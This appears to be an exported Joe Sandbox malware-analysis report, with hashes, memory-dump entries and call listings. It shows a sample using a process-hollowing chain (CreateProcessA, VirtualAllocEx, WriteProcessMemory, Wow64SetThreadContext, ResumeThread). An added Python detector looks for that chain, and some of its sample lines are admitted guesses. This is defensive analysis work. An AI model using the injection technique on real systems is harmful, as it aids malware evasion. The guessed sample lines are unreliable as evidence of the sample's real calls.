                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ed5d9f680872aa12061406900bc8d558268861f273af4b90d7755af6c333c2ac
                                • Instruction ID: 51ac182869fc745f0f06d27b00782093eecbc09d399466dc1a1a56d01180d595
                                • Opcode Fuzzy Hash: ed5d9f680872aa12061406900bc8d558268861f273af4b90d7755af6c333c2ac
                                • Instruction Fuzzy Hash: BE314970A002099FDB05DFA9D4947BEBBF6AF89340F248069E445EB354EB349C018B51
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 377fbda7457db34b85c6f0fe2a7113afde2ba6913e090849a22b75db998bb184
                                • Instruction ID: d4be747894ddf44f8b415ccbcb0c9c00878a54397b2b235d5e69d3a2f4342fa8
                                • Opcode Fuzzy Hash: 377fbda7457db34b85c6f0fe2a7113afde2ba6913e090849a22b75db998bb184
                                • Instruction Fuzzy Hash: 1E31AE75901B048EDB60DF6AD0883CAFBF2EF88320F28C45ED45D97205D7B85481CB91
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1b9586cac777ba0748d8d30d75aa4fcccde646a740739294168877488766e970
                                • Instruction ID: 818046793a87808dff2c664d2746fe60cd7cbac57072ec88e3adadc22179ffe0
                                • Opcode Fuzzy Hash: 1b9586cac777ba0748d8d30d75aa4fcccde646a740739294168877488766e970
                                • Instruction Fuzzy Hash: 3E310674A002048FCB18DF68D458A9EBBF6BF88314F1485AAD406EB3A0DF71EC45CB94
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 259249ce12199febb6df4c7e6a65b5a79f6edae5b4e813a12c863a94501bd62e
                                • Instruction ID: d8cef6d65cb27e6d26792684598b452bfded4481f38b3d67b00678d87b994df8
                                • Opcode Fuzzy Hash: 259249ce12199febb6df4c7e6a65b5a79f6edae5b4e813a12c863a94501bd62e
                                • Instruction Fuzzy Hash: 71312FB4A402099FDB04EFA4D594AAE77B7EFC4700F2084A99115AB395DE39ED018F91
                                Memory Dump Source
                                • Source File: 00000014.00000002.2236242570.0000000002A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A4D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2a4d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a1bfb7549e010fe36a56ba2749aec7c769a78fd2123cd53999e4f183916555b7
                                • Instruction ID: 88b2083c593e6dc89bd5fafb22d0d6007fab345894263f07c5ca95c5e5d9a6dc
                                • Opcode Fuzzy Hash: a1bfb7549e010fe36a56ba2749aec7c769a78fd2123cd53999e4f183916555b7
                                • Instruction Fuzzy Hash: C621F176600200EFDB05CF64D9C0F26BFA5FBC8314F64C5A9E9098A656CF3AD456CBA1
                                Memory Dump Source
                                • Source File: 00000014.00000002.2236242570.0000000002A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A4D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2a4d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 62fefd11fc57cd7b4429f55e0019b206f561688597264ec35614547afeb5e097
                                • Instruction ID: d022128824dab5922150c20866e3736b9f48ef05fa95098a83bfa43fbf73f4bb
                                • Opcode Fuzzy Hash: 62fefd11fc57cd7b4429f55e0019b206f561688597264ec35614547afeb5e097
                                • Instruction Fuzzy Hash: 6B213471504240DFDB14CF24D9C0B26BFA5FBD8314F20C56DD90A8B656DF7AE406CA62
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b11c71687d42e038cf0df4451e9053b8cc52f9d76174966655db1ac5b92ba613
                                • Instruction ID: 90fe1ccff0a9714581d3ee79789b933290f698c21ef8075c648ccd98c7528b86
                                • Opcode Fuzzy Hash: b11c71687d42e038cf0df4451e9053b8cc52f9d76174966655db1ac5b92ba613
                                • Instruction Fuzzy Hash: 36217CB5905B448FDB61CF6AD08878AFBF6EF88320F28C05DD85D97205D7B46480CB61
                                Memory Dump Source
                                • Source File: 00000014.00000002.2236242570.0000000002A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A4D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2a4d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 99119656afb1f532b4be2849c0a25ca352b6e53631749692b079677f97edb0f2
                                • Instruction ID: 99abf86e28a24ca242525a323fbd8adace9dbc7a4a28d94b7f00ffe0c9130595
                                • Opcode Fuzzy Hash: 99119656afb1f532b4be2849c0a25ca352b6e53631749692b079677f97edb0f2
                                • Instruction Fuzzy Hash: D82127B16442409FDB24DF28D5C4B26BBA5FBC4314F20C56DD9098B745CF3AD446CAA2
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4a4590b9ef3d40f06441aea5df1f28891e6330fa9c9d43206e5c2dd124177dd8
                                • Instruction ID: 99547263dd05a90ba102d95e373f7d6ad4e88fa1e52ab92a1c81421fb8fc24e5
                                • Opcode Fuzzy Hash: 4a4590b9ef3d40f06441aea5df1f28891e6330fa9c9d43206e5c2dd124177dd8
                                • Instruction Fuzzy Hash: BC110A767001188FCB04DBACE954A9DB7E6EFC8215B1440A9E509DB365DB34DC06CB90
                                Memory Dump Source
                                • Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3ffbebde9b35d4a10712fd4afd8cd023e121c422f922b3db043df4c88b989366
                                • Instruction ID: 0110052397fb5ee4a48582fed9d1a2c094fbbcd3638bcde2b1cae2b4a7d6f842
                                • Opcode Fuzzy Hash: 3ffbebde9b35d4a10712fd4afd8cd023e121c422f922b3db043df4c88b989366
                                • Instruction Fuzzy Hash: 6E11EFF1E0022ADFEB54CF59C681B6AB7F5EB45211F148166D90C87211D330D982DBA1
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c88d6a7d68c6e499df618c5a238d5412092f4f84c873d30c7d886a53b1f804cb
                                • Instruction ID: dca8b32f8e0efa2a43fe8baf1e6241860343f2c8e0c87e0576cdb3c7175b1cb0
                                • Opcode Fuzzy Hash: c88d6a7d68c6e499df618c5a238d5412092f4f84c873d30c7d886a53b1f804cb
                                • Instruction Fuzzy Hash: 890147367002155BCB06666DBC108DEBBAADFCA231B0080FBE40AC7740DF21AD0587E1
                                Memory Dump Source
                                • Source File: 00000014.00000002.2236242570.0000000002A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A4D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2a4d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                • Instruction ID: f36473ba2c50f447c596b41f745c12d1d8c831d51e487f19db2f2315e10234b8
                                • Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                • Instruction Fuzzy Hash: 0C219D76504240DFCF06CF10D9C4B16BF72FB88314F24C5A9D9494A656CB3AD46ACBA1
                                Memory Dump Source
                                • Source File: 00000014.00000002.2236242570.0000000002A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A4D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2a4d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                                • Instruction ID: 80888575aa390671c23151166d09ff724158dd0857223d5db9d754b83efbfb56
                                • Opcode Fuzzy Hash: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                                • Instruction Fuzzy Hash: F011DD75504280CFCB16CF14D5C4B15BFA1FBC4328F28C6AAD8498BA56C73AE44ACB62
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1d6ae135c4f748cecd76385cad31ad3d79185ce35702c501205e130d023d39a1
                                • Instruction ID: 2282dabcc3b608c49de18dfbfa6539d0a606c3dc960c150a649909afc7659ff2
                                • Opcode Fuzzy Hash: 1d6ae135c4f748cecd76385cad31ad3d79185ce35702c501205e130d023d39a1
                                • Instruction Fuzzy Hash: E20180356083449FD719CB75D594AAA7FE5EF45214B1484EEE04ACB6A2CB34EC45C740
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fb824545854bac59f4c31230bd78576ac780313cb2a35b69962ec93f50ca16e7
                                • Instruction ID: 21985baa14d6dbc1637e78bba8e3c6fd6e7bdb692fe3f8829070cded497e0032
                                • Opcode Fuzzy Hash: fb824545854bac59f4c31230bd78576ac780313cb2a35b69962ec93f50ca16e7
                                • Instruction Fuzzy Hash: 20012436B051489BCB06A674E8158ECBFB2EF88321F0490E6D40597351CA31AC16CBF1
                                Memory Dump Source
                                • Source File: 00000014.00000002.2236242570.0000000002A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A4D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2a4d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1e04e90d634e2f936e694f76980dc6fbe978928d934a7debcaa3b663106d0730
                                • Instruction ID: 61643fedfacc78d2de93d008514221d1c6b40112844801f5d3206973c2c2606f
                                • Opcode Fuzzy Hash: 1e04e90d634e2f936e694f76980dc6fbe978928d934a7debcaa3b663106d0730
                                • Instruction Fuzzy Hash: D811ACB5504280CFDB25DF24D5C4B25BBB1FB88318F24C6ADC8498BA56C73AD44ACB92
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a91bad56b0aa8cb7a90c6011476e1f0acaad379a031d3f6ca277101bc6d3ac0e
                                • Instruction ID: 8658021708bd6a21b25bccc462212a158c9cb3ba268ddfb110303543e5536d81
                                • Opcode Fuzzy Hash: a91bad56b0aa8cb7a90c6011476e1f0acaad379a031d3f6ca277101bc6d3ac0e
                                • Instruction Fuzzy Hash: BAF0C8363093642FD7018A795C509BBBFEDDF8666170445ABF444C7362CA65DD0487A0
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: faedc2698335e7a024509cdd1261a5f53a30f59b9257e06d58a54a83280c48c6
                                • Instruction ID: c74e96481b1bd9c538afb922c82836627da5732a5b2d266b14d1881a08531d90
                                • Opcode Fuzzy Hash: faedc2698335e7a024509cdd1261a5f53a30f59b9257e06d58a54a83280c48c6
                                • Instruction Fuzzy Hash: F1019235700218DFCB119B74E8486AEBBF6FB88315F104069E51AD3341DB369911CBA0
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b8e62974db60f0581d21aa9156a7f75b1b091644b48fe06b59e2bd3b7e43b832
                                • Instruction ID: 77f61288512e27db1aaa602bec2bf4c70095dc5f396c58f426e94846bf30a899
                                • Opcode Fuzzy Hash: b8e62974db60f0581d21aa9156a7f75b1b091644b48fe06b59e2bd3b7e43b832
                                • Instruction Fuzzy Hash: 78110534204750CFC728DF39D09085ABBF6EF8921536489ADD48A8B7A0DB36ED45CB50
                                Memory Dump Source
                                • Source File: 00000014.00000002.2236242570.0000000002A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A4D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2a4d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e3792d4809249b96924ef3f0e7bf891ce500fa6ffc277c4451680243a0e516ff
                                • Instruction ID: ca6869dfeef5b2e4b5010491c7f93d2407cd3e5314f43a55c67c2c9e2448c9a1
                                • Opcode Fuzzy Hash: e3792d4809249b96924ef3f0e7bf891ce500fa6ffc277c4451680243a0e516ff
                                • Instruction Fuzzy Hash: DA01A7714057449AE7208B15C9C4B67BFACEFC5364F18C52AED4A1B246CF79E841CAB1
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eafe675b9689bda5ed283715d55e158941277fb2d789353abb8e94550a75cba4
                                • Instruction ID: f64a8427fc3627ee89475b286903048f6027f98a97eacc4796b119318a18d214
                                • Opcode Fuzzy Hash: eafe675b9689bda5ed283715d55e158941277fb2d789353abb8e94550a75cba4
                                • Instruction Fuzzy Hash: A3010876D0075ADBCB04DFE4D9445EDFBB1FF99310F20072AE005A6A40EBB06686CB91
                                Memory Dump Source
                                • Source File: 00000014.00000002.2236242570.0000000002A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A4D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2a4d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4ba57013c71d6f7d1b6468b945fcc1a905b943ef9341a7846131552a27c4ba7f
                                • Instruction ID: 20b61fd1e206c243a09128b928bcb609a386b4279d4f421e8a46e2cdfe0cff97
                                • Opcode Fuzzy Hash: 4ba57013c71d6f7d1b6468b945fcc1a905b943ef9341a7846131552a27c4ba7f
                                • Instruction Fuzzy Hash: 3B01527100E3C09ED7128B258894B52BFB4DF87224F1D80DBD9898F1A7C6699845C772
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q$$]q$$]q
                                • API String ID: 0-858218434
                                • Opcode ID: dc649711f62c4fc6f5070ef6f93b15e16ec9fa117b7f7c6ac6d421d1ad1ad245
                                • Instruction ID: 4672d786c72e2366806e29035a59456a0a7ff3d00f1f23c0a6aa477cda07fbbe
                                • Opcode Fuzzy Hash: dc649711f62c4fc6f5070ef6f93b15e16ec9fa117b7f7c6ac6d421d1ad1ad245
                                • Instruction Fuzzy Hash: 9F216BB23503269BEB24693E8840B37B7DAABC0711F24847BD94DCB381DDB5CA52D361
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: pij$pij$J'l$J'l
                                • API String ID: 0-1868692445
                                • Opcode ID: faf9e980872961f7f651d1f7f0d3fd3c87d6059ffbb87da83e7d6fc2206e484e
                                • Instruction ID: 7b4d527bbc6afd1c30091ce3df69b20a417f722f8adabbac4e1415c6aa226c67
                                • Opcode Fuzzy Hash: faf9e980872961f7f651d1f7f0d3fd3c87d6059ffbb87da83e7d6fc2206e484e
                                • Instruction Fuzzy Hash: B231F7F1908325DFFF21CF25C8456A7BBB4BF01210F468066E90C8B151D736D986DBA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$J'l$J'l$J'l
                                • API String ID: 0-735925969
                                • Opcode ID: bc9fd5937e915b11fc936439e9c5b7a3619f2f56fde04246654289980c2bf840
                                • Instruction ID: d3fb07a28ad3e647bb609cc07684977471d87c8f703af8c9f7a32e6d3c2898bb
                                • Opcode Fuzzy Hash: bc9fd5937e915b11fc936439e9c5b7a3619f2f56fde04246654289980c2bf840
                                • Instruction Fuzzy Hash: 111178F271C3B18FE3260A286C12D63BF76BBD2700B1640A7D6489F256C6316846D7B2
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$$]q$$]q
                                • API String ID: 0-978391646
                                • Opcode ID: 6482dacb46ce32f4f37855636c1337a887cc8ff1381f84f939be09a04b40c940
                                • Instruction ID: 4a641160de74f61ad4093d382fe48cba6c80738e2bb99e4aa52676b777b5f5b1
                                • Opcode Fuzzy Hash: 6482dacb46ce32f4f37855636c1337a887cc8ff1381f84f939be09a04b40c940
                                • Instruction Fuzzy Hash: F901BC7060D3DA4FCB2B1238196011A6FB64FC3A4072A40E7C985DB2A7CD294C4A83A7

                                Execution Graph

                                Execution Coverage:10.5%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:168
                                Total number of Limit Nodes:12
                                execution_graph (node/edge dump of the rendered graph, flattened by extraction; the image itself is not recoverable). Call chains recoverable from the dump, by function start address:
                                • 164d5e0: GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId
                                • 164b250 -> 164b33a -> 164b580: GetModuleHandleW
                                • 93e0ff8 -> 93e1278 / 93e1271: PostMessageW
                                • 796db00 -> 796fa71 / 796fade, which fan out to the 93e0xxx helpers: 93e0107 and 93e016d -> CreateProcessA (796d76c / 796d778); 93e0521 -> VirtualAllocEx (796d430 / 796d429); 93e049d, 93e0833, 93e066f, 93e07a9, 93e0891, 93e0911 -> WriteProcessMemory (796d4f0 / 796d4e9); 93e03ed -> ReadProcessMemory (796d5e0 / 796d5d9); 93e0858 -> Wow64SetThreadContext (796cf20 / 796cf18); 93e0567 -> Wow64SetThreadContext then ResumeThread (796ce70 / 796ce68); 93e02f3, 93e06d1, 93e0753 -> ResumeThread
                                • 796de00 -> 796db94 -> 796fa71 / 796fade (12 API calls each)
                                • 1644668 -> 1644778 -> 1644878 / 1644888 -> 1644560 -> 1645d18: CreateActCtxA
                                • 164d828: DuplicateHandle
                                The CreateProcessA -> VirtualAllocEx -> WriteProcessMemory -> Wow64SetThreadContext -> ResumeThread set reached from 796db00 is the process-hollowing (RunPE) pattern: a suspended child is created, the payload is written into it, the thread context is pointed at it and the thread is resumed.
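The call set above can be checked mechanically from the report text rather than by reading the graph. The following is an added example (not part of the Joe Sandbox report, and not code from the sample) that parses the "APIs" and "Source File" bullets of the function listing, groups the calls per analysis process, and reports whether the hollowing chain is complete for each process. It assumes the report is available as plain text in the layout shown on this page; the sample below keeps only the bullet lines, and the VirtualAllocEx and ResumeThread entries in it are reconstructed from the execution-graph node addresses (796d470, 796ceb0), with their module names and argument lists guessed for the example.

```python
"""Pull per-process API calls out of a Joe Sandbox function listing and flag
the process-hollowing (RunPE) chain: CreateProcess -> VirtualAllocEx ->
WriteProcessMemory -> (Wow64)SetThreadContext -> ResumeThread."""
import re
from collections import defaultdict

# One "APIs" bullet, e.g. "• CreateProcessA.KERNELBASE(?,?), ref: 0796D9AE"
API_LINE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)(?:\([^)]*\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# First dotted field of the .sdmp name, read as hex, is the analysis process
# number that the Snapshot File name also carries (00000016 -> hcaresult_22_...).
SOURCE_LINE = re.compile(
    r"^•\s*Source File:\s*(?P<proc>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\.(?P<base>[0-9A-Fa-f]{16})\."
)
# Each hollowing step and the API spellings (Win32 or native) that satisfy it.
HOLLOWING_STEPS = [
    ("create_suspended", {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"}),
    ("alloc_remote", {"VirtualAllocEx", "NtAllocateVirtualMemory"}),
    ("write_remote", {"WriteProcessMemory", "NtWriteVirtualMemory"}),
    ("set_context", {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}),
    ("resume", {"ResumeThread", "NtResumeThread"}),
]


def parse_api_calls(report_text):
    """Return {process_number: {api_name: [call_site, ...]}}.

    The report prints a function's APIs first and its dump ("• Source File")
    afterwards, so API lines are buffered until the dump line says which
    process they belong to. A dump with no API lines still registers its process.
    """
    calls = defaultdict(lambda: defaultdict(list))
    pending = []
    for raw in report_text.splitlines():
        line = raw.strip()
        m = API_LINE.match(line)
        if m:
            pending.append((m["api"], int(m["ref"], 16)))
            continue
        m = SOURCE_LINE.match(line)
        if m:
            bucket = calls[int(m["proc"], 16)]  # creates the entry even if pending is empty
            for api, ref in pending:
                bucket[api].append(ref)
            pending = []
    return {proc: dict(apis) for proc, apis in calls.items()}


def hollowing_verdict(apis):
    """Map each chain step to the API that satisfied it, or None if unseen."""
    seen = set(apis)
    return {step: next((a for a in sorted(names) if a in seen), None)
            for step, names in HOLLOWING_STEPS}


def find_hollowing(report_text):
    """Return {process_number: (all_steps_present, verdict)} for every dumped process."""
    results = {}
    for proc, apis in parse_api_calls(report_text).items():
        verdict = hollowing_verdict(apis)
        results[proc] = (all(verdict.values()), verdict)
    return results


# Constructed sample: bullet lines taken from the function blocks on this page for
# analysis process 0x16 (22, the unpacked sample) and 0x14 (20, powershell, which has
# string-only blocks and no "APIs" section). The VirtualAllocEx and ResumeThread
# lines are reconstructed from execution-graph node addresses; module and args guessed.
SAMPLE = """\
• GetCurrentProcess.KERNEL32 ref: 0164D65E
• GetCurrentThreadId.KERNEL32 ref: 0164D731
• Source File: 00000016.00000002.2386822930.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0796D9AE
• Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0796D580
• Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0796CF9E
• Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
• VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0796D470
• ResumeThread.KERNEL32(?), ref: 0796CEB0
• Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
• Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
"""

if __name__ == "__main__":
    for proc, (complete, verdict) in sorted(find_hollowing(SAMPLE).items()):
        print(proc, "HOLLOWING chain complete" if complete else "chain incomplete", verdict)
```

Run against a full report export, the verdict dict also shows which step is missing when a process only has part of the chain, which is the usual way a packer stage (allocation and write only) is told apart from the final injector.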

                                Control-flow Graph

                                • Rendered graph omitted (executed / not-executed colouring is not recoverable from text). Basic blocks 164d5d0-164d7ad; API calls in blocks 164d5d0 (GetCurrentProcess), 164d678 (GetCurrentThread), 164d6b5 (GetCurrentProcess) and 164d713 (GetCurrentThreadId), plus an internal call to 164d7b1 from block 164d6f2.
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0164D65E
                                • GetCurrentThread.KERNEL32 ref: 0164D69B
                                • GetCurrentProcess.KERNEL32 ref: 0164D6D8
                                • GetCurrentThreadId.KERNEL32 ref: 0164D731
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386822930.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_1640000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 0ce6debf65b7efe62eefe77a0999f38e0cefca411e8f6acefeec1395f5392eff
                                • Instruction ID: 58558f020a93a969c324e1802845811703e774493bbd1b1e12f5ec841b0b8a3c
                                • Opcode Fuzzy Hash: 0ce6debf65b7efe62eefe77a0999f38e0cefca411e8f6acefeec1395f5392eff
                                • Instruction Fuzzy Hash: D75144B09012498FDB18EFA9D948BEEBBF1FF89304F208459D509A7760DB389944CF65

                                Control-flow Graph

                                • Rendered graph omitted (executed / not-executed colouring is not recoverable from text). Basic blocks 164d5e0-164d7ad, structurally identical to the 164d5d0 entry above; API calls in blocks 164d5e0 (GetCurrentProcess), 164d678 (GetCurrentThread), 164d6b5 (GetCurrentProcess) and 164d713 (GetCurrentThreadId), plus an internal call to 164d7b1 from block 164d6f2.
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0164D65E
                                • GetCurrentThread.KERNEL32 ref: 0164D69B
                                • GetCurrentProcess.KERNEL32 ref: 0164D6D8
                                • GetCurrentThreadId.KERNEL32 ref: 0164D731
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386822930.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_1640000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 92b0c770b96b3b062b411b54d9b912ad24c5de163db7aaf35482a07b30188488
                                • Instruction ID: cad92d7062eeb8e35f1c7fa16f3efe3d98cee4e7f2ad80c5d9fb99c3244cbdca
                                • Opcode Fuzzy Hash: 92b0c770b96b3b062b411b54d9b912ad24c5de163db7aaf35482a07b30188488
                                • Instruction Fuzzy Hash: 0E5135B09012498FDB18DFA9D948BAEBBF1FF88304F208059D509A7760DB385944CF65

                                Control-flow Graph

                                • Rendered graph omitted (executed / not-executed colouring is not recoverable from text). Basic blocks 796d76c-796dabd; the single API call, CreateProcessA, sits in block 796d907-796d9c1, preceded by four short copy loops (796d82d, 796d886, 796d8ee and their neighbours) and followed by a chain of flag checks (796da52-796daa5) ending in a self-looping block at 796dabd.
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0796D9AE
                                Memory Dump Source
